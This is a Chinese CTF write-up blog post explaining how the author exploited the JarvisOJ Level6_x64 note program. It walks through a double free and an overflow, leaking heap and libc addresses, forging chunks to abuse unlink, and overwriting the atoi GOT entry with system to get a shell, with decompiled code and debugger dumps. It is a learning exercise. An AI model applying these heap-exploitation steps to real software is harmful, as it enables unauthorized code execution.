<!DOCTYPE html>
<html>
<head><meta name="generator" content="Hexo 3.8.0">
  <meta charset="utf-8">
  
  <title>堆入门-JarvisOJ-Level6_x64 | Twings</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="前言之前看过一点点堆的资料……然后就被劝退了，最近又硬着头皮捡起来看，打算用这道题来入门堆，调了两天，装了个 pwndbg ，看堆舒服了很多，最后总算是搞懂了，写篇文章总结一下。">
<meta name="keywords" content="CTF,Pwn">
<meta property="og:type" content="article">
<meta property="og:title" content="堆入门-JarvisOJ-Level6_x64">
<meta property="og:url" content="http://yoursite.com/2019/05/09/堆入门-JarvisOJ-Level6-x64/index.html">
<meta property="og:site_name" content="Twings">
<meta property="og:description" content="前言之前看过一点点堆的资料……然后就被劝退了，最近又硬着头皮捡起来看，打算用这道题来入门堆，调了两天，装了个 pwndbg ，看堆舒服了很多，最后总算是搞懂了，写篇文章总结一下。">
<meta property="og:locale" content="zh-CN">
<meta property="og:updated_time" content="2019-05-09T13:44:52.124Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="堆入门-JarvisOJ-Level6_x64">
<meta name="twitter:description" content="前言之前看过一点点堆的资料……然后就被劝退了，最近又硬着头皮捡起来看，打算用这道题来入门堆，调了两天，装了个 pwndbg ，看堆舒服了很多，最后总算是搞懂了，写篇文章总结一下。">
  
    <link rel="alternate" href="/atom.xml" title="Twings" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  
    <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  
  <link rel="stylesheet" href="/css/style.css">
  <link rel="stylesheet" href="/plugin/bganimation/bg.css">
  

</head>
</html>
<body>
  <div id="container">
    <div id="wrap">
      <div class="outer">
        <div class="widget-wrap mobile-header">
  <h3 class="widget-title"></h3>
  <div class="widget">
    <img class="avatar" src="https://github.com/Aluvion/aluvion.github.io/blob/master/css/images/31733328.jfif?raw=true">
    <h2 class="author">Aluvion</h2>
    <h3 class="description">摸鱼</h3>
    <div class="count-box">
      <a href="/archives"><div><strong>34</strong><br>文章</div></a>
      <a href="/categories"><div><strong>0</strong><br>分类</div></a>
      <a href="/tags"><div><strong>6</strong><br>标签</div></a>
    </div>
    <ul class="blog-link">
     
          <a href="/" title="Home">
            <li>主页</li>
          </a>
        
          <a href="/archives" title="Archives">
            <li>归档</li>
          </a>
        
          <a href="/categories" title="Categories">
            <li>分类</li>
          </a>
        
          <a href="/tags" title="Tags">
            <li>标签</li>
          </a>
        
    </ul>
  </div>
</div>

        <section id="main"><article id="post-堆入门-JarvisOJ-Level6-x64" class="wow slideInRight article article-type-post" itemscope="" itemprop="blogPost">
  <div class="article-meta">
    <a href="/2019/05/09/堆入门-JarvisOJ-Level6-x64/" class="article-date">
  <time class="post-time" datetime="2019-05-09T10:33:47.000Z" itemprop="datePublished">
    <span class="post-month">5月</span><br>
    <span class="post-day">09</span>
  </time>
</a>
   
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      堆入门-JarvisOJ-Level6_x64
    </h1>
  

        <div>
          
          
              

          
        </div>
      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <!-- <div id="toc" class="toc-article">
    <div class="toc-title">目录</div>
    <ol class="toc"><li class="toc-item toc-level-3"><a class="toc-link" href="#前言"><span class="toc-text">前言</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#解题思路"><span class="toc-text">解题思路</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#EXP-编写"><span class="toc-text">EXP 编写</span></a><ol class="toc-child"><li class="toc-item toc-level-4"><a class="toc-link" href="#泄露-heap-基地址-泄露-libc-基地址"><span class="toc-text">泄露 heap 基地址 / 泄露 libc 基地址</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#原理"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#libc-基地址计算"><span class="toc-text">libc 基地址计算</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#heap-基地址计算"><span class="toc-text">heap 基地址计算</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#unlink"><span class="toc-text">unlink</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#原理-1"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#栗子"><span class="toc-text">栗子</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#泄露-libc-基地址"><span class="toc-text">泄露 libc 基地址</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#原理-2"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#栗子-1"><span class="toc-text">栗子</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#劫持-GOT-表"><span class="toc-text">劫持 GOT 表</span></a><ol class="toc-child"><li class="toc-item toc-level-5"><a class="toc-link" href="#原理-3"><span class="toc-text">原理</span></a></li><li class="toc-item toc-level-5"><a class="toc-link" href="#栗子-2"><span class="toc-text">栗子</span></a></li></ol></li><li class="toc-item toc-level-4"><a class="toc-link" href="#完整exp"><span class="toc-text">完整exp</span></a></li></ol></li></ol>
</div> -->
        <h3 id="前言"><a href="#前言" class="headerlink" title="前言"></a>前言</h3><p>之前看过一点点堆的资料……然后就被劝退了，最近又硬着头皮捡起来看，打算用这道题来入门堆，调了两天，装了个 pwndbg ，看堆舒服了很多，最后总算是搞懂了，写篇文章总结一下。</p>
<a id="more"></a>
<hr>
<h3 id="解题思路"><a href="#解题思路" class="headerlink" title="解题思路"></a>解题思路</h3><p>首先是保护机制：</p>
<figure class="highlight shell"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">[*] '/home/aluvion/\xe6\xa1\x8c\xe9\x9d\xa2/freenote_x64'</span><br><span class="line">    Arch:     amd64-64-little</span><br><span class="line">    RELRO:    Partial RELRO</span><br><span class="line">    Stack:    Canary found</span><br><span class="line">    NX:       NX enabled</span><br><span class="line">    PIE:      No PIE (0x400000)</span><br></pre></td></tr></table></figure>
<p>没有开 PIE，且 GOT 表可写。</p>
<p>IDA 反编译看代码，看到代码逻辑：</p>
<ul>
<li>先申请一个 0x1810 大小的堆作为索引表，然后将最大堆数 256 放进堆里</li>
<li>new note，将1（表示该堆已分配）、堆大小、堆地址放入索引表中，堆的大小是 0x80 的倍数</li>
<li>list note，按照索引表中的地址读取堆内容</li>
<li>edit note，按照索引表中的地址修改堆内容</li>
<li>delete note，按照索引表中的地址 free 堆</li>
</ul>
<p>可以看到读入 note 内容的时候没有加上 \x00，利用 list note 功能可以泄露地址：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">for</span> ( i = <span class="number">0</span>; (<span class="keyword">signed</span> <span class="keyword">int</span>)i &lt; (<span class="keyword">signed</span> <span class="keyword">int</span>)a2; i += v4 )</span><br><span class="line">&#123;</span><br><span class="line">    v4 = read(<span class="number">0</span>, (<span class="keyword">void</span> *)(a1 + (<span class="keyword">signed</span> <span class="keyword">int</span>)i), (<span class="keyword">signed</span> <span class="keyword">int</span>)(a2 - i));</span><br><span class="line">    <span class="keyword">if</span> ( v4 &lt;= <span class="number">0</span> )</span><br><span class="line">    	<span class="keyword">break</span>;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到 delete_note 功能中存在漏洞，只要输入的 note 编号小于总数就可以 free，没有检查，存在 double free 和 UAF 漏洞，触发 unlink 就可以任意地址写：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( v1 &gt;= <span class="number">0</span> &amp;&amp; (<span class="keyword">signed</span> __int64)v1 &lt; *(_QWORD *)qword_6020A8 )</span><br><span class="line">&#123;</span><br><span class="line">    --*(_QWORD *)(qword_6020A8 + <span class="number">8</span>);</span><br><span class="line">    *(_QWORD *)(qword_6020A8 + <span class="number">24L</span>L * v1 + <span class="number">16</span>) = <span class="number">0L</span>L;</span><br><span class="line">    *(_QWORD *)(qword_6020A8 + <span class="number">24L</span>L * v1 + <span class="number">24</span>) = <span class="number">0L</span>L;</span><br><span class="line">    <span class="built_in">free</span>(*(<span class="keyword">void</span> **)(qword_6020A8 + <span class="number">24L</span>L * v1 + <span class="number">32</span>));</span><br><span class="line">    result = <span class="built_in">puts</span>(<span class="string">"Done."</span>);</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>
<p>可以看到 edit_note 功能中，对输入长度没有做检验，可以溢出覆盖：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> ( v3 != *(_QWORD *)(qword_6020A8 + <span class="number">24L</span>L * v4 + <span class="number">24</span>) )</span><br><span class="line">&#123;</span><br><span class="line">   	v1 = (<span class="keyword">unsigned</span> <span class="keyword">int</span>)((<span class="keyword">signed</span> <span class="keyword">int</span>)(<span class="number">128</span> - (((((<span class="keyword">unsigned</span> <span class="keyword">int</span>)((<span class="keyword">unsigned</span> __int64)v3 &gt;&gt; <span class="number">32</span>) &gt;&gt; <span class="number">25</span>) + (_BYTE)v3) &amp; <span class="number">0x7F</span>) - ((<span class="keyword">unsigned</span> <span class="keyword">int</span>)((<span class="keyword">unsigned</span> __int64)v3 &gt;&gt; <span class="number">32</span>) &gt;&gt; <span class="number">25</span>))) &gt;&gt; <span class="number">31</span>) &gt;&gt; <span class="number">25</span>;</span><br><span class="line">    v2 = qword_6020A8;</span><br><span class="line">    *(_QWORD *)(v2 + <span class="number">24L</span>L * v4 + <span class="number">32</span>) = <span class="built_in">realloc</span>(*(<span class="keyword">void</span> **)(qword_6020A8 + <span class="number">24L</span>L * v4 + <span class="number">32</span>), (<span class="keyword">signed</span> <span class="keyword">int</span>)((((_BYTE)v1 + <span class="number">-128</span> - (<span class="keyword">char</span>)v3 % <span class="number">-128</span>) &amp; <span class="number">0x7F</span>) - v1 + v3));</span><br><span class="line">    *(_QWORD *)(qword_6020A8 + <span class="number">24L</span>L * v4 + <span class="number">24</span>) = v3;</span><br><span class="line">&#125;</span><br><span class="line"><span class="built_in">printf</span>(<span class="string">"Enter your note: "</span>);</span><br><span class="line">write_note_content(*(_QWORD *)(qword_6020A8 + <span class="number">24L</span>L * v4 + <span class="number">32</span>), v3);</span><br><span class="line">result = <span class="built_in">puts</span>(<span class="string">"Done."</span>);</span><br></pre></td></tr></table></figure>
<p>那思路就很明确了：利用 list note 泄露地址，堆溢出伪造，然后通过触发 unlink 劫持 GOT 表，将某个函数地址改写为 system 来 getshell。</p>
<h3 id="EXP-编写"><a href="#EXP-编写" class="headerlink" title="EXP 编写"></a>EXP 编写</h3><h4 id="泄露-heap-基地址-泄露-libc-基地址"><a href="#泄露-heap-基地址-泄露-libc-基地址" class="headerlink" title="泄露 heap 基地址 / 泄露 libc 基地址"></a>泄露 heap 基地址 / 泄露 libc 基地址</h4><h5 id="原理"><a href="#原理" class="headerlink" title="原理"></a>原理</h5><p>free 掉两个不连续的 chunk 之后，它们会被放入 unsorted bin 中，跟 unsorted bin 的地址通过 fd 和 bk 指针构成一个双向链表，比如我 free 了编号 1 和 3 的两个堆：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">unsortedbin</span><br><span class="line">all: <span class="number">0x1cfa8b0</span> —▸ <span class="number">0x1cfa9d0</span> —▸ <span class="number">0x7f93c61a1b78</span> (main_arena+<span class="number">88</span>) ◂— <span class="number">0x1cfa8b0</span></span><br></pre></td></tr></table></figure>
<p>由此我们有两种方案可以将地址泄露出来：</p>
<ul>
<li><p>从前一个堆进行溢出，覆盖掉被 free 堆的 head，这是 chunk0 和 chunk1 的数据，可以看到 chunk1 被 free 之后有了 fd 和 bk 两个指针（0xf2b8c0）：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br></pre></td><td class="code"><pre><span class="line">pwndbg&gt; x/<span class="number">40</span>xg <span class="number">0xf2b820</span></span><br><span class="line"><span class="number">0xf2b820</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000091</span></span><br><span class="line"><span class="number">0xf2b830</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0xf2b840</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0xf2b850</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0xf2b860</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0xf2b870</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0xf2b880</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0xf2b890</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0xf2b8a0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0xf2b8b0</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000091</span></span><br><span class="line"><span class="number">0xf2b8c0</span>:	<span class="number">0x0000000000f2b9d0</span>	<span class="number">0x00007fe399d8eb78</span></span><br><span class="line"><span class="number">0xf2b8d0</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0xf2b8e0</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0xf2b8f0</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0xf2b900</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0xf2b910</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0xf2b920</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0xf2b930</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br></pre></td></tr></table></figure>
<p>chunk0 溢出覆盖 0xf2b8b0 地址处的 chunk1 的 head（0xf2b8b0），即可通过 list note 泄露处 0xf2b8c0 处的地址（chunk3地址和main_arena+88，即unsorted bin这个”chunk”的”head”）。</p>
</li>
<li><p>原理同上，申请一个同样大小的新堆，如果内容长度不足这两个指针不会被覆盖，我们可以只覆盖 fd，泄露 bk。</p>
</li>
</ul>
<h5 id="libc-基地址计算"><a href="#libc-基地址计算" class="headerlink" title="libc 基地址计算"></a>libc 基地址计算</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x7fe399d8eb10</span> &lt;__malloc_hook&gt;:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x7fe399d8eb20</span> &lt;main_arena&gt;:	<span class="number">0x0000000100000000</span>	<span class="number">0x0000000000000000</span></span><br></pre></td></tr></table></figure>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">libc_base = 泄露出来的(main_arena + <span class="number">88</span>)的地址 - libc.symbols[<span class="string">"__malloc_hook"</span>] - <span class="number">88</span> - <span class="number">0x10</span>或者<span class="number">0x20</span></span><br></pre></td></tr></table></figure>
<p>具体是 0x10 还是 0x20 就很玄学，比如这题我本地是 0x10，远程是 0x20。或者也可以在 unlink 之后利用任意地址写进行泄露。</p>
<h5 id="heap-基地址计算"><a href="#heap-基地址计算" class="headerlink" title="heap 基地址计算"></a>heap 基地址计算</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">heap_base = 泄露出来的chunk3的地址 - <span class="number">0x1810</span>(一开始申请的大堆的大小) - <span class="number">0x10</span>(大堆的head) - <span class="number">0x90</span>(小堆的大小) * <span class="number">3</span>(chunk3之前的chunk的数量)</span><br></pre></td></tr></table></figure>
<h4 id="unlink"><a href="#unlink" class="headerlink" title="unlink"></a>unlink</h4><h5 id="原理-1"><a href="#原理-1" class="headerlink" title="原理"></a>原理</h5><p>我在 free 了 chunk0 之后，如果我再 free chunk1，就会触发向前合并，chunk0 就会被 unlink。而 unlink 操作中有一个这样子的操作：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">FD = P -&gt; fd                                                       </span><br><span class="line">BK = P -&gt; bk</span><br><span class="line">FD -&gt; bk = BK</span><br><span class="line">BK -&gt; fd = FD</span><br></pre></td></tr></table></figure>
<p>通过这个操作，我们可以改写指向 chunk0 的指针 p（即索引表中的指针）指向 p - 3 的地址，然后我们利用 edit note 功能对 p 进行修改，即可实现任意地址写。</p>
<p>还会进行检查：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">P -&gt; fd -&gt; bk == P</span><br><span class="line">P -&gt; bk -&gt; fd == P</span><br><span class="line">P -&gt; fd_nextsize -&gt; bk_nextsize == P</span><br><span class="line">P -&gt; bk_nextsize -&gt; fd_nextsize == P</span><br></pre></td></tr></table></figure>
<p>所以我们堆溢出伪造的时候需要加以注意。</p>
<h5 id="栗子"><a href="#栗子" class="headerlink" title="栗子"></a>栗子</h5><p>泄露地址之后的 chunk0 和 chunk1 长这样：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x730820</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000121</span></span><br><span class="line"><span class="number">0x730830</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x730840</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x730850</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x730860</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x730870</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x730880</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x730890</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x7308a0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x7308b0</span>:	<span class="number">0x6565656565656565</span>	<span class="number">0x6565656565656565</span></span><br><span class="line"><span class="number">0x7308c0</span>:	<span class="number">0x6565656565656565</span>	<span class="number">0x00007f43ad461b78</span></span><br><span class="line"><span class="number">0x7308d0</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0x7308e0</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0x7308f0</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0x730900</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0x730910</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0x730920</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br><span class="line"><span class="number">0x730930</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br></pre></td></tr></table></figure>
<p>我们通过溢出伪造 chunk0 和 chunk1：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x83a820</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000121</span></span><br><span class="line"><span class="number">0x83a830</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000000080</span></span><br><span class="line"><span class="number">0x83a840</span>:	<span class="number">0x0000000000839018</span>	<span class="number">0x0000000000839020</span></span><br><span class="line"><span class="number">0x83a850</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x83a860</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x83a870</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x83a880</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x83a890</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x83a8a0</span>:	<span class="number">0x6161616161616161</span>	<span class="number">0x6161616161616161</span></span><br><span class="line"><span class="number">0x83a8b0</span>:	<span class="number">0x0000000000000080</span>	<span class="number">0x0000000000000090</span></span><br><span class="line"><span class="number">0x83a8c0</span>:	<span class="number">0x7070707070707070</span>	<span class="number">0x7070707070707070</span></span><br><span class="line"><span class="number">0x83a8d0</span>:	<span class="number">0x7070707070707070</span>	<span class="number">0x7070707070707070</span></span><br><span class="line"><span class="number">0x83a8e0</span>:	<span class="number">0x7070707070707070</span>	<span class="number">0x7070707070707070</span></span><br><span class="line"><span class="number">0x83a8f0</span>:	<span class="number">0x7070707070707070</span>	<span class="number">0x7070707070707070</span></span><br><span class="line"><span class="number">0x83a900</span>:	<span class="number">0x7070707070707070</span>	<span class="number">0x7070707070707070</span></span><br><span class="line"><span class="number">0x83a910</span>:	<span class="number">0x7070707070707070</span>	<span class="number">0x7070707070707070</span></span><br><span class="line"><span class="number">0x83a920</span>:	<span class="number">0x7070707070707070</span>	<span class="number">0x7070707070707070</span></span><br><span class="line"><span class="number">0x83a930</span>:	<span class="number">0x6262626262626262</span>	<span class="number">0x6262626262626262</span></span><br></pre></td></tr></table></figure>
<p>此时我们有一个指向 chunk0 的指针位于 0x839030（从0x839020开始，每三个数据代表一个chunk，即是否被分配、大小和地址）：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x839000</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000001821</span></span><br><span class="line"><span class="number">0x839010</span>:	<span class="number">0x0000000000000100</span>	<span class="number">0x0000000000000003</span></span><br><span class="line"><span class="number">0x839020</span>:	<span class="number">0x0000000000000001</span>	<span class="number">0x0000000000000100</span></span><br><span class="line"><span class="number">0x839030</span>:	<span class="number">0x000000000083a830</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x839040</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x000000000083a8c0</span></span><br></pre></td></tr></table></figure>
<p>显然 unlink 的检查可以绕过，并且在 unlink 之后我们可以覆盖指向 chunk0 的指针为 p - 3：</p>
<figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x839000</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000001821</span></span><br><span class="line"><span class="number">0x839010</span>:	<span class="number">0x0000000000000100</span>	<span class="number">0x0000000000000002</span></span><br><span class="line"><span class="number">0x839020</span>:	<span class="number">0x0000000000000001</span>	<span class="number">0x0000000000000100</span></span><br><span class="line"><span class="number">0x839030</span>:	<span class="number">0x0000000000839018</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x839040</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x000000000083a8c0</span></span><br></pre></td></tr></table></figure>
<p>之后我们对 note 0 进行 edit 的时候，即可修改 0x0000000000839018 地址之后的数据，修改的时候注意哪里的数据需要修改，哪里的不需要修改。</p>
<h4 id="泄露-libc-基地址"><a href="#泄露-libc-基地址" class="headerlink" title="泄露 libc 基地址"></a>泄露 libc 基地址</h4><h5 id="原理-2"><a href="#原理-2" class="headerlink" title="原理"></a>原理</h5><p>利用 edit note 功能对 p 进行修改的时候，可以改写其中一个 chunk 的地址为想要泄露的地址，比如 elf.got[“atoi”]，然后利用 list note 功能即可进行泄露。</p>
<h5 id="栗子-1"><a href="#栗子-1" class="headerlink" title="栗子"></a>栗子</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x839000</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000001821</span></span><br><span class="line"><span class="number">0x839010</span>:	<span class="number">0x0000000000000100</span>	<span class="number">0x0000000000000002</span></span><br><span class="line"><span class="number">0x839020</span>:	<span class="number">0x0000000000000001</span>	<span class="number">0x0000000000000100</span></span><br><span class="line"><span class="number">0x839030</span>:	<span class="number">0x0000000000839018</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x839040</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x000000000083a8c0</span></span><br></pre></td></tr></table></figure>
<p>将 0x839040 处的地址修改为 elf.got[“atoi”]，在 list 的时候即可打印 atoi 函数的地址。</p>
<h4 id="劫持-GOT-表"><a href="#劫持-GOT-表" class="headerlink" title="劫持 GOT 表"></a>劫持 GOT 表</h4><h5 id="原理-3"><a href="#原理-3" class="headerlink" title="原理"></a>原理</h5><p>利用 edit note 功能对 p 进行修改的时候，可以改写其中一个 chunk 的地址为想要覆盖的地址，比如 elf.got[“atoi”]，然后利用 edit note 功能即可进行修改。</p>
<h5 id="栗子-2"><a href="#栗子-2" class="headerlink" title="栗子"></a>栗子</h5><figure class="highlight c"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="number">0x839000</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x0000000000001821</span></span><br><span class="line"><span class="number">0x839010</span>:	<span class="number">0x0000000000000100</span>	<span class="number">0x0000000000000002</span></span><br><span class="line"><span class="number">0x839020</span>:	<span class="number">0x0000000000000001</span>	<span class="number">0x0000000000000100</span></span><br><span class="line"><span class="number">0x839030</span>:	<span class="number">0x0000000000839018</span>	<span class="number">0x0000000000000000</span></span><br><span class="line"><span class="number">0x839040</span>:	<span class="number">0x0000000000000000</span>	<span class="number">0x000000000083a8c0</span></span><br></pre></td></tr></table></figure>
<p>将 0x839040 处的地址修改为 elf.got[“atoi”]，在 edit note1 的时候即可覆盖 atoi 函数的地址。</p>
<h4 id="完整exp"><a href="#完整exp" class="headerlink" title="完整exp"></a>完整exp</h4><p>在编写 exp 的时候还有很多细节需要注意：</p>
<ul>
<li>new 5个 chunk，防止 free chunk3 的时候向top chunk合并。</li>
<li>发送 note 内容的时候不要 sendline，换行符会被分开当成下一次输入时的 choice，影响 recvuntil 获取地址。</li>
<li>unlink 覆盖 p 之后，edit 的时候要注意长度要跟上次一样，不然会进入判断调用 realloc 导致程序崩溃。（payload.ljust(0x100, ‘p’)）</li>
